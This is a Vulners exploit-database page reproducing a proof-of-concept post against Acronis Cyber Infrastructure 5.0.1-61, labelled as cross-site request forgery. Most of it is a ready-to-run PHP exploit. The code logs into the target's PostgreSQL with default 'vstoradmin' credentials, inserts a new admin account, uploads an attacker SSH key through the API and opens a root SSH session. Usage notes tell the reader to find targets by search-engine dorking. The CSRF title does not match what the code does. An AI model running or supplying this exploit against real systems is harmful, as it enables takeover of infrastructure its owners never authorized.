Vulners
Lucene search
Acronis Cyber Infrastructure 5.0.1-61 Cross Site Request Forgery
`=============================================================================================================================================
| # Title : Acronis Cyber Infrastructure 5.0.1-61 CSRF Add ADmin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.acronis.com/en-eu/products/cyber-infrastructure/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] add new admin.
[+] Line 83 + 100 +138 + 202 set your target .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php
[+] PayLoad :
<?php
class AcronisExploit {
private $sshSocket;
private $dbConn;
private $clusterId;
public function __construct() {
// Initialize default values
$this->sshSocket = null;
$this->dbConn = null;
$this->clusterId = null;
}
// Function to add an admin user to PostgreSQL DB
public function addAdminUser($username, $userid, $password) {
echo "Creating admin user $username with userid $userid\n";
// Insert new admin user into the user table
$resQuery = $this->postgresQuery("INSERT INTO \"user\" VALUES('$userid','{}','T',NULL,NULL,NULL,'default');");
if (!$resQuery) return false;
// Insert new admin user into the local_user table
$resQuery = $this->postgresQuery("SELECT MAX(id) FROM \"local_user\";");
if (!$resQuery) return false;
$idLuser = pg_fetch_result($resQuery, 0, 0) + 1;
$resQuery = $this->postgresQuery("INSERT INTO \"local_user\" VALUES('$idLuser','$userid','default','$username',NULL,NULL);");
if (!$resQuery) return false;
// Hash the password
$passwordHash = password_hash($password, PASSWORD_BCRYPT);
echo "Setting password $password with hash $passwordHash\n";
$today = date('Y-m-d');
$resQuery = $this->postgresQuery("INSERT INTO \"password\" VALUES('$idLuser','$idLuser',NULL,'F','$passwordHash',0,NULL,DATE '$today');");
if (!$resQuery) return false;
// Assign admin roles
$idProjectRole = $this->postgresQuery("SELECT id FROM \"project\" WHERE name = 'admin' AND domain_id = 'default';");
$idAdminRole = $this->postgresQuery("SELECT id FROM \"role\" WHERE name = 'admin';");
echo "Assigning the admin roles: $idProjectRole and $idAdminRole\n";
$this->postgresQuery("INSERT INTO \"assignment\" VALUES('UserProject','$userid','$idProjectRole','$idAdminRole','F');");
echo "Successfully created admin user $username with password $password\n";
return true;
}
// Function to run a PostgreSQL query
private function postgresQuery($query) {
$result = pg_query($this->dbConn, $query);
if (!$result) {
echo "PostgreSQL query failed: " . pg_last_error($this->dbConn) . "\n";
return false;
}
return $result;
}
// Function to login to SSH
public function doSshLogin($ip, $user, $sshKey) {
$connection = ssh2_connect($ip, 22);
if (!$connection) {
echo "SSH connection failed\n";
return false;
}
if (ssh2_auth_pubkey_file($connection, $user, $sshKey['public'], $sshKey['private'])) {
$this->sshSocket = $connection;
return true;
} else {
echo "SSH authentication failed\n";
return false;
}
}
// Function to login to Acronis Cyber Infrastructure web portal
public function aciLogin($name, $pwd) {
$postData = json_encode([
'username' => $name,
'password' => $pwd
]);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/login");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/json',
'X-Requested-With: XMLHttpRequest'
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
return (strpos($response, '"code":200') !== false);
}
// Function to get the cluster ID
public function getClusterId() {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/clusters");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
$data = json_decode($response, true);
if (isset($data['data'][0]['id'])) {
return $data['data'][0]['id'];
}
return null;
}
// Function to generate SSH keys
private function generateSshKeys() {
$privateKey = tempnam(sys_get_temp_dir(), 'ssh_private');
$publicKey = $privateKey . '.pub';
ssh2_genkeypair($privateKey, $publicKey);
return [
'private' => $privateKey,
'public' => $publicKey
];
}
// Function to upload SSH public key
public function uploadSshKey($sshKey, $clusterId) {
$postData = json_encode([
'key' => $sshKey,
'event' => [
'name' => 'SshKeys',
'method' => 'post',
'data' => [
'key' => $sshKey
]
]
]);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/$clusterId/ssh-keys");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/json',
'X-Requested-With: XMLHttpRequest'
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
return (strpos($response, '"task_id"') !== false);
}
// Main exploit function
public function exploit($rhost, $dbPort, $sshPort, $username, $password) {
// Connect to PostgreSQL
$this->dbConn = pg_connect("host=$rhost port=$dbPort dbname=keystone user=vstoradmin password=vstoradmin");
if (!$this->dbConn) {
echo "Could not connect to PostgreSQL database\n";
return false;
}
// Add a new admin user
$newUsername = substr(md5(rand()), 0, 8);
$newPassword = substr(md5(rand()), 0, 16);
$userId = bin2hex(random_bytes(16));
$this->addAdminUser($newUsername, $userId, $newPassword);
// Login to Acronis
if (!$this->aciLogin($newUsername, $newPassword)) {
echo "Failed to login to Acronis\n";
return false;
}
// Get cluster ID
$this->clusterId = $this->getClusterId();
if (!$this->clusterId) {
echo "Failed to get cluster ID\n";
return false;
}
// Generate SSH keys
$sshKey = $this->generateSshKeys();
// Upload SSH public key
if (!$this->uploadSshKey($sshKey['public'], $this->clusterId)) {
echo "Failed to upload SSH public key\n";
return false;
}
// SSH Login
if (!$this->doSshLogin($rhost, 'root', $sshKey)) {
echo "SSH login failed\n";
return false;
}
echo "Exploit successful, SSH session established!\n";
return true;
}
}
// Example usage
$exploit = new AcronisExploit();
$exploit->exploit('target-ip', 6432, 22, 'vstoradmin', 'vstoradmin');
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Oct 2024 00:00Current
7.4High risk
Vulners AI Score7.4